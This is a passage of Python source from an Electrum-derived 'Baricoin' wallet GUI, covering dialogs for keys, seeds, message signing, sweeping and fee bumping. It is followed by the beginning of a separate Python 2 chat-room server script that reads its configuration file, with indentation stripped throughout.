line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self, dialog):
assert not self.wallet.has_lightning()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
if self.question(msg):
self._init_lightning_dialog(dialog=dialog)
@protected
def _init_lightning_dialog(self, *, dialog, password):
dialog.close()
self.wallet.init_lightning(password=password)
self.update_lightning_icon()
self.show_message(_('Lightning keys have been initialized.'))
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('False')
if self.wallet.has_seed():
seed_available = _('True')
ks = self.wallet.keystore
assert isinstance(ks, keystore.Deterministic_KeyStore)
seed_available += f" ({ks.get_seed_type()})"
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Baricoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Baricoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
def cb(success: bool, error: str, data):
if not success:
if error:
self.show_error(error)
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
scan_qrcode(parent=self.top_level_window(), config=self.config, callback=cb)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# note that closeEvent is NOT called if the user quits with Ctrl-C
self.clean_up()
event.accept()
def clean_up(self):
if self._cleaned_up:
return
self._cleaned_up = True
if self.wallet.thread:
self.wallet.thread.stop()
self.wallet.thread = None
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
if self._update_check_thread:
self._update_check_thread.exit()
self._update_check_thread.wait()
if self.tray:
self.tray = None
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb: Optional[int]) -> Optional[int]:
if fee_per_kb is None:
return None
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = round(fee)
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
d.run()
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
d.run()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
ChatRoom2.0Server.py
|
#!/usr/bin/env python
# -.- coding: utf-8 -.-y
import base64
import datetime
import getpass
import os
import Queue
import socket
import sqlite3
import subprocess
import sys
import time
import threading
from cmd import Cmd
from Crypto.Cipher import AES
from Crypto import Random
#Created by Camerin Figueroa
cv = "2.0"
q = Queue.Queue()
q.put([[]])
errors = Queue.Queue()
errors.put([])
motd = Queue.Queue()
quit = Queue.Queue()
quit.put("")
mesg = Queue.Queue()
mesg.put("")
online = Queue.Queue()
online.put([])
print """\33[91m
═════════════════════════════════════════════════════════
███████ ██████ ███████
█ █ █ █ ║
█ █════╗ █ ╔═█ ║
█═════════════█ ╚█ ║█═══╝
█ ██████ ║█
█ █ █ ╚╗█ ╔═══════Server
█════════╗ █ █ ╚═█ ║
███████ ║ █ █ ███████
Chat Room Client════════╝
═════════════════════════════════════════════════════════
\33[92m"""
port = 99999
configcont = "#Replace Everything behind = sign\n#Ex before: config = edit\n#Ex after: config = configinput\n\nmotd = Hello world This is a new Chat Room Server made by Camerin Figueroa\nport = 22550\ndatabase = ./crdb.db"
if os.path.isfile('./crsconfig.txt') == True:
f = open('./crsconfig.txt', 'r')
configuration = f.read()
f.close()
configuration = configuration.split("\n")
for line in configuration:
if "motd =" in line:
motd.put(line[6:])
else:
pass
if "database =" in line:
dbdir = line[11:]
else:
pass
if "port = " in line:
port = int(line[7:])
else:
pass
else:
f = open('./crsconfig.txt', 'w')
f.write(configcont)
f.close()
print "Please edit crsconfig.txt"
sys.exit()
if port != 99999:
pass
else:
f = open('./crsconfig.txt', 'w')
